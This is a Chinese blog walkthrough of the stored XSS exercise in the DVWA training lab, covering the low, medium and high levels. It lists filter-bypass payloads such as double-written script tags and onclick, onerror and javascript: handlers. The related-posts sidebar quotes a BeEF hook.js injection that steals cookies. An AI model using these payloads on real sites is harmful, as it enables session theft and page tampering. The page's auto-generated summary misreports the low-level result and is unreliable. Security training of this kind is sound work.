DVWA-XSS(Stored)注入-Low-Medium-Hight

已于 2023-02-09 19:37:16 修改
阅读量497 收藏 2
点赞数
文章标签: xss 安全 前端
于 2023-02-05 18:11:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39330735/article/details/128891533
版权
文章描述了一次XSS跨站脚本攻击的尝试,从低到高难度,展示了如何测试和绕过网站对<script>标签的过滤。在低级别,简单的<script>注入被阻止。在中级,使用闭合和特殊字符组合尝试未成功。高级部分探讨了其他可利用的HTML标签,如<button>和<svg>,以及如何利用属性注入。文章还提到了PHP的strip_tags()和addslashes()函数在防护中的应用。
摘要由CSDN通过智能技术生成

Low

1、进来这里可以看到,好像是有两个入口,先随便填个数据试试水,勒特

        payload:  <script>alert(1)</script>

           

 2、直接提交,简单拿下。

         

Medium

1、继续尝试刚才的入口,勒特。

        payload:  <script>alert(1)</script>

        

            

        结合前端和源码,可以看到<script>全部被吃了!

2、老规矩,喊个方法喂(双写) 

        payload:  <sc<script>ript>alert(1)</sc<script>ript>

       

        从结果中可以看到,同样这个<script>是被吃的死死的,作者很喜欢吃<script>,所以high就不尝试<script>了。

3、闭合——这是一个思路,这里的话就不用去尝试了,没办法闭合

 4、查看源码可以发现有两个函数

       这时请度娘

        1.strip_tags()
                strip_tags()函数剥去 HTML、XML 以及 PHP 的标签。
        2.addslashes()
                函数是PHP中的内置函数,它返回预定义字符前带有反斜杠的字符串。该参数中不包含任何指定的字符。 预定义的字符是: 单引号(’) 双引号(“) 反斜杠(\) NULL 

        结论:可以看到 massage被守得很死。但是name只是做了一个替换。所以换地方!

 5、name入口他的长度被限制,但是不慌!~

        F12修改默认长度,这里我50,你随意!

         

   6、上才艺:

         <button Onclick="alert(1)">拿下</button>

        <svg src=1 Onerror=alert(1'>

        <a href='javascript:alert(1)'>老六</a>

               

        

Hight

 1、先查看一下源码,

  •         从代码中可以看出script 、<都被过滤,如果实在看不懂可以这样来
  •         注意这里得注入点也是name,先修改文本得长度
  •                
  •         提交payload:   > 1  "  2  '  3  #  4  /  5 <  6  <!--
  •          
  • 从这里可以得出可以使用得符号,注意这里提交之后要记得点击Clear Guestbook,按钮不然后面得内容都会被注释!

2、从代码中就能够看出,我们还可以使用不包含 script  的其他标签

  • <button Onclick="alert(1)">拿下</button>

  • <svg src="1" Onclick="alert(1)">  

W金刚葫芦娃W
关注
XSS(Stored)
kid的博客
05-02 2963
XSS(Stored) 前言 看了一个web的安全视频,里面有说说有的web漏洞都是输入输出的控制问题,虽然感觉说的太笼统了。但确实没什么毛病。sql注入来说,对用户的输入做好处理,对服务端的输出做好处理,对于我这样的菜鸡来说就很难了(字符型注入对单引号转义就感觉好难做啊) XSS也是这样。因为对用户输入控制的不严格,让用户的输入被当做代码执行。这和sql感觉就十分相似了。只不过一个是对数据库一个...
网络安全-靶机dvwaXSS注入Low到High详解(含代码分析)_dvwa xss注入
2401_84300255的博客
04-27 839
正常可以看到是Get型。
dvwa中的xss(跨站脚本)攻击
无痕的博客
01-17 2398
xss攻击介绍与在dvwa中的xss攻击演示
Web安全学习之——基于dvwaXSS (Stored)学习教程
weixin_41657031的博客
07-19 384
1.什么是XSS(stored)? 存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie等 例子: 发一篇文章,里面包含了恶意脚本 今天和女朋友出去约会了,心情不错<script>alert('handsome ...
DVWA-xss全等级教程
Mild_Wind_Jun的博客
06-18 1209
low等级: 反射型(reflected) 在输入框随便输入一串字符,跟踪字符发现其出现在<pre>标签中,于是可以通过自建标签方式进行弹框, 这里输入<script>alert(1)</script>来实现弹框。 当然还能输入<img src="xx" onerror="javascript:alert(1)"/> 也可以通过输入<svg onload="javascript:alert(1)"></svg> .
dvwaxss中使用beef
Alsn86的博客
01-18 684
dvwaxss中使用beef kali ip为192.168.253.8,在kali里启动beef 在自动跳转出的登录页面登录beef,用户名密码都是beef 在受害机,192.168.253.8,进行xss,其中<script src=http://192.168.253.132:3000/hook.js>,点击提交 好了,beef里可以看见192.168.253.8上线了,获取了cookie, 上线后就出现很多可以利用的模块了,我们试试重定向 发现192.168.253.8
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA-master安装包
02-28
DVWA-master:深入探索Web安全的实践指南》 DVWA(Damn Vulnerable Web Application)是一款专门为网络安全教育设计的开源Web应用程序。它以其易用性和丰富的漏洞类型,为初学者和专业人士提供了一个理想的学习...
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
DVWA笔记
weixin_51151498的博客
10-22 298
DVWA
网络安全-靶机dvwaXSS注入Low到High详解(含代码分析)
关注网络安全、云原生安全
10-18 9498
本篇文章,针对靶机dvwa(Damn Vulnerable Web Application)中的XSS(DOM)、XSS(Reflected)、XSS(Stored)的LOW、MIDIUM、HIGH安全级别使用网络安全-js安全知识点与XSS常用payloads中提到的XSS注入payloads,使用手工进行XSS注入。并根据网络安全-php安全知识点对LOW、MIDIUM、HIGH、IMPOSSIBLE安全级别的代码进行解释。 目标:弹出窗口/获得cookie XSS(DOM)-LOW 正常 可
DVWA-XSS(Stored) 全级别教程
weixin_44716769的博客
09-08 2404
XSS(Reflectrd) Low等级 查看源码 1.trim(string,charlist) 函数移除字符串两侧的空白字符或其他预定义字符,预定义字符包括、\t、\n、\x0B、\r以及空格,可选参数charlist支持添加额外需要删除的字符。 2.mysql_real_escape_string(string,connection) 函数会对字符串中的特殊符号(\x00,\n,\r,\,‘,“,\x1a)进行转义。 3.stripslashes(string)函数删除字符串中的反斜杠。 可以看到,
DVWA中(medium)、高(high)级别xss
白帽小学二年级的博客
12-23 1011
DVWA中(medium)、高(high)级别xss
XSS注入基础入门篇
好好睡觉
02-17 5572
XSS注入基础,XSS注入原理,XSS注入分类
xss漏洞以及beef的使用
young‘s blog
07-20 3098
这次的xss漏洞就从dvwa开始吧。 反射型: 先是low级别的,输入1后页面变为 这次尝试一下burpsuite里自带的扫描器。 首先不得不说dvwa设计有一些缺陷,有时候等级改不过去,这就让人很蛋疼,所以还是要自己手动改一下。就因为这个,扫描器一直扫不出来。用了改过之后的包就可以扫描了。上图 可以看到箭头指向的就是payload 看一下返回页面,就是弹框1了。没啥别的。 抓一下返回包看一看 可...
反射型XSS--理论
最新发布
m0_56019217的博客
11-07 642
攻击者事先在Web页面中植入恶意代码,一般是攻击链接。当用户进入页面时,恶意代码不会自动执行,而是需要用户自己去点击链接后,反射型XSS攻击才会进行。理论就是这么多,接下来我们举几个实例,来熟悉反射型XSS攻击的原理与恶意代码的形式。
#渗透测试#SRC漏洞挖掘#XSS跨站脚本介绍02绕过
soc的博客
11-03 1246
免责声明 本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章阅读。
dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
m0_47484034的博客
11-05 252
dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
ctfshow(316,317,318)--XSS漏洞--反射性XSS
m0_56019217的博客
11-06 398
当前页面的cookie是flag=you%20are%20not%20admin%20no%20flag。但是这里我使用XSS平台,显示的cookie还是这样,并不能得到flag。首先想到利用XSS平台解题,看其他师傅的wp提示flag是在cookie中。于是我们使用稳定性更高的方法:写js代码将cookie传到自己的服务器上。查看自己服务器中的cookie.txt文件,得到flag。显示是关于反射性XSS的题目。提交之后成功跳转到自己的网页。
DVWA-XSS(DOM)
08-25
DVWA-XSS(DOM)是指DVWA靶机学习中的一种XSS攻击,它利用了DOM(文档对象模型)中的漏洞。DOM是一个与平台、编程语言无关的接口,允许程序或脚本动态地访问和更新文档内容、结构和样式。而DVWA-XSS(DOM)攻击则是通过在DOM中注入恶意脚本来篡改网页,从而控制用户浏览器的一种攻击行为。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [houkc.github.io:HouKC的博客](https://download.csdn.net/download/weixin_42157567/18459500)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [DVWA-XSS(DOM)](https://blog.csdn.net/weixin_44866139/article/details/104101228)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值